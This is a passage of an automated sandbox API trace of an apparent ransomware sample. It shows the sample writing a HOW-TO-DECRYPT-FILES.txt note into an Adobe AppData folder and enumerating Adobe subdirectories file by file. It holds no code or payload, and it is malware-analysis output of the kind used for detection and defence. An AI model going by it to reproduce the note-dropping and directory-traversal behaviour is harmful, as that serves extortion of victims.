"c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.047] GetLastError () returned 0x0 [0050.047] GetFileType (hFile=0x184) returned 0x1 [0050.047] SetErrorMode (uMode=0x0) returned 0x1 [0050.047] GetFileType (hFile=0x184) returned 0x1 [0050.048] CloseHandle (hObject=0x184) returned 1 [0050.048] GetLastError () returned 0x0 [0050.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4d [0050.048] GetLastError () returned 0x0 [0050.048] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0050.048] GetLastError () returned 0x0 [0050.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages", lpFilePart=0x0) returned 0x43 [0050.048] GetLastError () returned 0x0 [0050.049] SetErrorMode (uMode=0x1) returned 0x0 [0050.049] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), fInfoLevelId=0x0, lpFileInformation=0x1d02604 | out: lpFileInformation=0x1d02604*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7b19f10, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xd7b19f10, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xdc68b450, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.049] GetLastError () returned 0x0 [0050.049] SetErrorMode (uMode=0x0) returned 0x1 [0050.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4d [0050.049] GetLastError () returned 0x0 [0050.049] SetErrorMode (uMode=0x1) returned 0x0 [0050.049] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\adobe\\acrobat\\10.0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.049] GetLastError () returned 0x5 [0050.051] SetErrorMode (uMode=0x0) returned 0x1 [0050.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search", lpFilePart=0x0) returned 0x3b [0050.051] GetLastError () returned 0x5 [0050.051] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.051] GetLastError () returned 0x5 [0050.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.051] GetLastError () returned 0x5 [0050.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search", lpFilePart=0x0) returned 0x3b [0050.051] GetLastError () returned 0x5 [0050.051] SetErrorMode (uMode=0x1) returned 0x0 [0050.051] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.052] GetLastError () returned 0x5 [0050.052] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.052] GetLastError () returned 0x5 [0050.052] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.052] GetLastError () returned 0x12 [0050.052] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.052] SetErrorMode (uMode=0x0) returned 0x1 [0050.052] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search", lpFilePart=0x0) returned 0x3b [0050.052] GetLastError () returned 0x12 [0050.052] SetErrorMode (uMode=0x1) returned 0x0 [0050.053] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.053] GetLastError () returned 0x12 [0050.053] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.053] GetLastError () returned 0x12 [0050.053] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.053] GetLastError () returned 0x12 [0050.053] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.053] SetErrorMode (uMode=0x0) returned 0x1 [0050.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics", lpFilePart=0x0) returned 0x33 [0050.053] GetLastError () returned 0x12 [0050.053] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.053] GetLastError () returned 0x12 [0050.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.053] GetLastError () returned 0x12 [0050.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics", lpFilePart=0x0) returned 0x33 [0050.053] GetLastError () returned 0x12 [0050.053] SetErrorMode (uMode=0x1) returned 0x0 [0050.054] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.054] GetLastError () returned 0x12 [0050.054] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.054] GetLastError () returned 0x12 [0050.054] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.054] GetLastError () returned 0x12 [0050.054] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.054] GetLastError () returned 0x12 [0050.054] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.054] SetErrorMode (uMode=0x0) returned 0x1 [0050.054] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics", lpFilePart=0x0) returned 0x33 [0050.054] GetLastError () returned 0x12 [0050.054] SetErrorMode (uMode=0x1) returned 0x0 [0050.054] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.054] GetLastError () returned 0x12 [0050.055] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.055] GetLastError () returned 0x12 [0050.055] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.055] GetLastError () returned 0x12 [0050.055] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.055] GetLastError () returned 0x12 [0050.055] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.055] SetErrorMode (uMode=0x0) returned 0x1 [0050.055] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", lpFilePart=0x0) returned 0x40 [0050.055] GetLastError () returned 0x12 [0050.055] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.055] GetLastError () returned 0x12 [0050.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.055] GetLastError () returned 0x12 [0050.055] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", lpFilePart=0x0) returned 0x40 [0050.055] GetLastError () returned 0x12 [0050.055] SetErrorMode (uMode=0x1) returned 0x0 [0050.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.056] GetLastError () returned 0x12 [0050.056] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.056] GetLastError () returned 0x12 [0050.056] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.056] GetLastError () returned 0x12 [0050.056] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.056] GetLastError () returned 0x12 [0050.056] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.056] SetErrorMode (uMode=0x0) returned 0x1 [0050.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", lpFilePart=0x0) returned 0x40 [0050.056] GetLastError () returned 0x12 [0050.056] SetErrorMode (uMode=0x1) returned 0x0 [0050.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.057] GetLastError () returned 0x12 [0050.057] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.057] GetLastError () returned 0x12 [0050.057] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.057] GetLastError () returned 0x12 [0050.057] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.057] GetLastError () returned 0x12 [0050.057] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.057] SetErrorMode (uMode=0x0) returned 0x1 [0050.057] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", lpFilePart=0x0) returned 0x58 [0050.057] GetLastError () returned 0x12 [0050.057] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.057] GetLastError () returned 0x12 [0050.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.057] GetLastError () returned 0x12 [0050.057] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", lpFilePart=0x0) returned 0x58 [0050.057] GetLastError () returned 0x12 [0050.057] SetErrorMode (uMode=0x1) returned 0x0 [0050.058] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.060] GetLastError () returned 0x12 [0050.060] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.060] GetLastError () returned 0x12 [0050.060] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.060] GetLastError () returned 0x12 [0050.060] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.060] GetLastError () returned 0x12 [0050.061] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.061] GetLastError () returned 0x12 [0050.061] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.061] GetLastError () returned 0x12 [0050.061] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.061] GetLastError () returned 0x12 [0050.061] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.061] GetLastError () returned 0x12 [0050.061] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.061] GetLastError () returned 0x12 [0050.061] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.061] GetLastError () returned 0x12 [0050.061] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.061] GetLastError () returned 0x12 [0050.062] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.062] GetLastError () returned 0x12 [0050.062] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.062] GetLastError () returned 0x12 [0050.062] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.062] GetLastError () returned 0x12 [0050.062] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.062] GetLastError () returned 0x12 [0050.062] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.062] GetLastError () returned 0x12 [0050.062] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.062] GetLastError () returned 0x12 [0050.062] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.062] GetLastError () returned 0x12 [0050.063] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.063] GetLastError () returned 0x12 [0050.063] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.063] GetLastError () returned 0x12 [0050.063] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.063] GetLastError () returned 0x12 [0050.063] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.063] GetLastError () returned 0x12 [0050.063] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.063] GetLastError () returned 0x12 [0050.063] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.063] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.064] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.064] GetLastError () returned 0x12 [0050.065] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.065] GetLastError () returned 0x12 [0050.065] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.065] GetLastError () returned 0x12 [0050.065] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.065] GetLastError () returned 0x12 [0050.065] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.067] SetErrorMode (uMode=0x0) returned 0x1 [0050.067] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", lpFilePart=0x0) returned 0x58 [0050.067] GetLastError () returned 0x12 [0050.067] SetErrorMode (uMode=0x1) returned 0x0 [0050.067] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.069] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.069] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.070] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.070] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.071] GetLastError () returned 0x12 [0050.071] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.071] GetLastError () returned 0x12 [0050.072] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.073] SetErrorMode (uMode=0x0) returned 0x1 [0050.073] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all", lpFilePart=0x0) returned 0x5c [0050.073] GetLastError () returned 0x12 [0050.073] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.073] GetLastError () returned 0x12 [0050.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.073] GetLastError () returned 0x12 [0050.073] GetFullPathNameW (in: 